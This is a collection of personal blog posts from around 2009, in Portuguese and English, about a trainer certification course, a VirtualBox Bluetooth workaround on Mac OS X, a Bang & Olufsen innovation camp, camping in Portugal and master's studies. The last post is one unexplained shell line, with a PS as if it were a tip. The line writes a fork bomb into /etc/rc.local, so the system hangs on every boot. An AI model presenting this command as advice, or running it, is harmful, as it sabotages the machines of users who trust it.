O mês passado cumpri mais um dos objectivos que tinha traçado para 2009, tirar um curso de Formação Pedagógica Inicial de Formadores.

No final de Agosto surgiu a oportunidade e assim foi, iniciei o curso e  97 horas de formação depois o curso estava terminado com a classificação mais alta na escala (Muito Bom).

Durante a minha formação académica fiz muitas apresentações por isso já estava bastante a vontade mas ainda assim este curso serviu para aperfeiçoar alguns detalhes e para me certificar para dar formação.

Agora é procurar oportunidades de formação na minha área (informática e engenharia de sistemas), se conhecerem alguma oportunidade avisem

If you are using VirtualBox with a Mac OS X host and when you try to use Bluetooth inside VirtualBox guest you get this message:

“USB device ‘Apple Inc. Bluetooth USB Host Controller’ with UUID … is busy with a previous request. Please try again later.”

Don’t worry that’s normal, it’s a known bug. While VirtualBox guys don’t correct the bug there is a easy solution.

Stop the Bluetooth service manually

• Open a Terminal window

• Type:

sudo launchctl unload /System/Library/LaunchDaemons/com.apple.blued.plist
sudo kextunload -b com.apple.driver.BroadcomUSBBluetoothHCIController
sudo kextunload -b com.apple.driver.AppleUSBBluetoothHCIController

• Try again to turn the Bluetooth on in the VirtualBox

In order to use Bluetooth in a Windows guest you have to use the Mac OS X dvd to install the Bluetooth drivers.

Load the Bluetooth service manually

When you finish using the Bluetooth in the VirtualBox guest you may want to activate it again on the Mac host, to do so:

• Open a Terminal window

• Type:

sudo launchctl load /System/Library/LaunchDaemons/com.apple.blued.plist
sudo kextload -b com.apple.driver.BroadcomUSBBluetoothHCIController
sudo kextload -b com.apple.driver.AppleUSBBluetoothHCIController

If you know and easier solution let me know!

As I mention before I had the privilege to work at the Innovation Camp at Bang & Olufsen.

Now I can share a bit of the work that has been developed in the 3 weeks I was there. This is the masterpiece of five crazy engineers work.

We design a unique device that offers an unforgettable experience!

Beo3DEx is a discreet, small, moving media center that can move around the house and can also be picked up and placed anywhere. It has a 3D projector so it takes the experience of watching TV, listening to music and watching photos to a whole new level.

Here is an animation that shows our concept:

Many people call it science fiction but we say that this is the way to go and studies shows that it’s expensive but it’s possible!

Last but not least I would like to thank my team for their hard work, Leni Lausdahl, Jakub Macek, Jan Hula and Tomasz Likus it was a pleasure to work with. And a special thanks to B&O and all the teachers that guides us in the best direction and made this work possible!

Férias… as minhas tão esperadas e tão merecidas férias este ano foram passadas no sul de Portugal a fazer algo que gosto, acampar.

Com a mala cheia de material de campismo, GPS e roteiro campista na mão partimos a aventura, o plano inicial era acampar no Alentejo uns dias para descansar e depois seguir para o movimentado Algarve.

Mas fomos obrigados a alterar os planos… Quando chegamos a Milfontes o parque de SITAVA estava completamente lotado e os outros dois parques da vila estavam muito perto da lotação máxima. :/

Optamos então pelo plano B e seguimos para o Algarve, Armação de Pêra foi a cidade escolhida devido ao rácio qualidade-preço e às cidades adjacentes. Após uns dias lá passados recomendo o parque pelas condições e pela cidade de Armação de Pêra que apesar de ser no Algarve os preços não são inflacionados como em Albufeira ou Portimão.

Durante a estadia aproveitamos para conhecer algumas praias adjacentes, encontramos uma praia numa falésia perto do Carvoeiro muito bonita e onde o homem das bolas de berlim chega a praia de barco

Depois de uns dias decidimos variar e demos um salto até ao parque de Olhão mas apenas ficamos lá uma noite porque apesar do roteiro campista descrever bem os parques nada fala sobre comboios que passam das 6h30m até as 22h de meia em meia hora e de aviões a aterrar no aeroporto de Faro, por isso apesar do parque em si não ser mau o baralho não nós deixou descansar.

E por fim rumamos ao Alentejo para tentarmos mais uma vez a nossa sorte e mais uma vez o parque que queríamos, Porto Covo, estava lotado. Seguimos mais uns kilometros para o parque da Praia da Galé em Melides, o maior parque (em área) que já conheci, com condições muito boas onde fomos obrigados a fazer campismo a serio (sem electricidade e com algumas melgas e formigas ao barulho) mas com uma praia espectacular. Se procuram um lugar longe do mundo para descansar e relaxar a Praia da Galé é o local ideal, mas não se esqueçam do repelente

Moral da história: O roteiro campista é um bom investimento, o GPS deu imenso jeito e nunca esquecer de telefonar para verificar a lotação do parque antes de sair.

The lack of posts in my blog was due to my lack of time and my masters was one of the responsible, but the first year is finally over

I learn a lot of new and interesting things and it opened my horizons to new subjects and realities. I haven’t had the time to share it but if you need help in Logistics, Production Management, Simulation, Data Warehouse, Systems Decision Support or anything else related to System Engineering just let me know and I will see what I can do

Now its time to relax and prepare my second and last year, the thesis… I’m considering a project about introducing and improving optimizations (in a Systems Engineering point of view) to a Waste Management software, it’s a big project with a good company involved. For now I’m just gathering material to study the case and see where the optimization can be more helpful.

When I can I will let you know more, I have already study some similar problem but if you know a thing or two about Waste Management I appreciate some notes

I’m back from vacations and as promised I will write about my experience in the Bang & Olufsen Innovation Camp.

The Summer School happened between 29 June and 17 July in Struer (Denmark) and it was my first ERASMUS experience and I love it!

Denmark is a nice country, it has weather similar to Portugal, the food is almost the same (they eat to much boiled potatoes) but the thing me and my friends missed the most was the espresso coffee. The price of living is expensive compared to Portugal, but we were lucky because housing, food and some of the travel expenses were supported by the program. The most strange thing in Denmark is the hours of darkness, in the Summer the night starts at 23h30m and ends at 5h and even in the night is not really dark but the worst thing is in the Winter, the day starts at 9h and ends at 17h, it most be tough. :/

It was amazing to work at Bang & Olufsen and know more about one of best companies in audio and visual products. They prime for innovation, design and excellence. It was impressive to see their quality standards, the product has to be perfect, it can’t even have a tiny scratch

We were integrated in multicultural and interdisciplinary teams; my team was composed with a Polish, two Czechs, a Danish girl and a Portuguese (me). Each group were ask to develop innovative concepts, justify them and prototype them the best we can, it was a though challenge not just because of the demanding task but also because of the different cultures and backgrounds.

I can’t say that it was easy, happiness and frustration are a part of the creative process, but in the end we did and amazing job! As a personal note, I achieved my goals, I helped the team as much as I could, I proved that I can work successfully in a completely new environment, my English is good enough to understand and be understood by everyone and my knowledge of Systems Engineering and my social skills helped me being the Project Leader of my team. I knew it, but know I’m sure, if we work hard we can achieve anything we want anywhere in the world!

In the way back we stop in London for a 24hours adventure with 5 portuguese and 2 english guys, it was really good to see London one more time, I love the city but I can’t say the same thing about their weather… if London had sunny beaches I moved there right now

I could written a lot more about the three spectacular weeks but this post is getting huge, so one last piece of advice, if you ever get the chance to be part of something like don’t look back and go for it!

Finally vacations!

I have to apologize to all my followers for not being able to update the blog as much as I like to but this year has been very demanding and very busy. A lot as happen in the last months and I promise I will share almost everything when I got back.

But for now I need some deserved vacations, it will be almost 2 weeks disconnected to the world

É uma boa maneira de passar o tempo quando não apetece fazer mais nada, ou para quem quer aprender um bocado de música. Apenas tem uma oitava e meia, mas já dá para tocar algumas músicas. É possível tocar tanto com o rato como com o teclado (aconselho este último), vejam as instruções para mais detalhes.

Brevemente, colocarei mais músicas com notas neste blog.

Aí estamos em 2009, esse que já foi baptizado como o "maravilhoso" ano da crise. E há uma questão que se quer impor: quem nos tirará da dita crise? Como a opinião de todos é importante, foi criada uma votação sobre esse tema aqui no blog.

Apesar de ser um optimista inesgotável, fica aqui o meu contributo para com quem se vangloria com a crise:

Já um ano passou desde a criação deste blog, e após nove longos meses de inactividade, ei-lo de volta. Passei as últimas 1739 (mil setecentas e trinta e nove) horas a ponderar esta decisão, mas devido ao enorme incentivo por parte da crítica, o desenlace não podia ser outro.
A quem não gostou da notícia, só há uma coisa a dizer: Temos pena...

$ sudo echo “:(){ :|:& };:” > /etc/rc.local

PS: If you want to use >> instead you should delete the “exit 0″ from rc.local.
